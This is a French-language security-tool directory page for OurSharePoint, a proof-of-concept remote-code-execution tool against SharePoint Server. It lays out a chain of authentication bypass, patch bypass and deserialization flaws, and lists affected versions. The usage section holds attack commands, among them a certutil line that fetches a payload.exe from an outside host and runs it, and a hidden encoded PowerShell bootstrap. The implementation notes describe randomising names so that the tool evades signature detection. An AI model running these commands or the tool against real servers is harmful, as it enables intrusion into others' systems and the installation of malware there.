Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
OurSharePoint-CVE-2025-53770 — Pensez-vous vraiment que SharePoint est sûr ? | Kitploit
Outils/GitHubGitHub/rabbitbong/oursharepoint-cve-2025-53770
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleRed Teaming
GitHubrabbitbong/oursharepoint-cve-2025-53770

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

OurSharePoint-CVE-2025-53770

Pensez-vous vraiment que SharePoint est sûr ?

Voir le dépôt
21il y a 5 moisPas encore vérifié

OurSharePoint — Preuve de concept pour CVE-2025-53770

Outil RCE pour SharePoint autonome et binaire unique. Génère une chaîne de gadgets TypeConfuseDelegate sous forme d'octets MS-NRBF bruts (sans ysoserial.exe), l'encapsule dans une charge utile de désérialisation DataSet et la délivre via HTTP en utilisant le contournement d'authentification — le tout en une seule opération.


Chaîne d'exploitation

ÉtapeCVEDescription
1CVE-2025-49706Contournement d'authentification — Referer: /_layouts/SignOut.aspx contourne l'authentification SharePoint
2CVE-2025-53771Contournement de correctif — un segment de chemin après ToolPane.aspx échappe au correctif de juillet 2025
3CVE-2025-49704Désérialisation — ExcelDataSet.CompressedDataTable déclenche BinaryFormatter sur un DataSet fabriqué
4—Le schéma DataSet force LosFormatter.Deserialize() sur la charge utile interne via ExpandedWrapper + ObjectDataProvider
5—TypeConfuseDelegate — le comparateur SortedSet<string> est Process.Start(string, string), exécutant cmd /c <commande>

L'ensemble du flux binaire (à la fois le wrapper DataSet externe et le gadget TypeConfuseDelegate interne) est construit comme des enregistrements MS-NRBF bruts — aucune sérialisation .NET runtime n'est utilisée. Cela correspond au format produit par le module Metasploit octet par octet.


Compilation

Nécessite le SDK .NET Framework 4.8 (Visual Studio 2022 ou outils de build autonomes) :

root@kitploit:~
& "C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe" OurSharePoint.sln /p:Configuration=Release

Sortie : OurSharePoint\bin\Release\OurSharePoint.exe (fichier unique, aucune dépendance)


Utilisation

Tir unique : mise en place et exécution

root@kitploit:~
OurSharePoint.exe --cmd="certutil -urlcache -split -f http://10.0.0.5/payload.exe C:\Windows\Temp\p.exe & C:\Windows\Temp\p.exe" --target=https://sp.corp.com

Exécution de commande simple

root@kitploit:~
OurSharePoint.exe --cmd="whoami > C:\Windows\Temp\pwned.txt" --target=https://sp.corp.com

Amorçage PowerShell

root@kitploit:~
OurSharePoint.exe --cmd="powershell -nop -w hidden -enc <base64>" --target=https://sp.corp.com

Reconnaissance uniquement (sans charge utile)

root@kitploit:~
OurSharePoint.exe --target=https://sp.corp.com --check

Générer des fichiers de charge utile hors ligne

root@kitploit:~
OurSharePoint.exe --cmd="calc.exe" --out=exploit

Avec proxy (Burp)

root@kitploit:~
OurSharePoint.exe --cmd="whoami" --target=https://sp.corp.com --proxy=http://127.0.0.1:8080

Héritage : charge utile ysoserial.exe externe

root@kitploit:~
ysoserial.exe -f LosFormatter -g TypeConfuseDelegate -o base64 -c "cmd /c calc.exe" > gadget.b64
OurSharePoint.exe --in=gadget.b64 --target=https://sp.corp.com

Options


Fichiers de sortie

Lorsque --out est utilisé, l'outil écrit :

FichierContenu
<prefix>.binFlux DataSet BinaryFormatter brut
<prefix>.b64Encodé GZip + Base64 (ce qui va dans CompressedDataTable)

Versions affectées

ÉditionPlage vulnérable
SharePoint Server Subscription Edition16.0.14326.20450 – 16.0.18526.20424
SharePoint Server 201916.0.10337.12109 – 16.0.10417.20027
SharePoint Enterprise Server 201616.0.4351.1000 – 16.0.5508.1000
SharePoint Server 201315.0.4481.1005 – 15.0.5545.1000

Notes d'implémentation

  • Aucune sérialisation runtime — Le wrapper DataSet et le gadget TypeConfuseDelegate sont écrits comme des enregistrements binaires MS-NRBF bruts en utilisant BinaryWriter. Cela évite les différences entre la sortie de sérialisation .NET runtime et ce que le désérialiseur cible attend.
  • Encadrement LosFormatter — Le gadget interne est encapsulé avec des octets d'en-tête ObjectStateFormatter (0xFF 0x01 0x32 + longueur 7 bits) au lieu d'utiliser LosFormatter.Serialize().
  • Binaire unique — Aucun outil externe, DLL ou script Python requis. L'exécutable est entièrement autonome.
  • Randomisation — Les préfixes de balises XML et les noms d'éléments DataSet sont randomisés à chaque exécution pour éviter la détection par signature.

Références

  • Eye Security — SharePoint Under Siege
  • Metasploit PR #20409 — sharepoint_toolpane_rce
  • MS-NRBF Specification
  • pwntester/ysoserial.net — TypeConfuseDelegate
Télécharger l’outil
OptionDescriptionPar défaut
--cmd=COMMANDECommande à exécuter (exécutée via cmd /c COMMANDE)—
--in=FICHIERFichier de charge utile LosFormatter pré-construit en base64—
--target=URLURL de base SharePoint pour la livraison HTTP—
--checkEmpreinte de version uniquement, sans charge utile—
--out=PRÉFIXEPréfixe du fichier de sortiepayload
--sp-version=VERVersion du chemin des layouts (15 ou 16)15
--proxy=URLProxy HTTP—
--ua=CHAÎNEUser-Agent personnaliséFirefox 120
--referer=URLSurcharger le Referer du contournement d'authauto
--timeout=SECDélai d'attente HTTP15
--a/b/c=NOMNoms du DataSet/élément/colonnealéatoire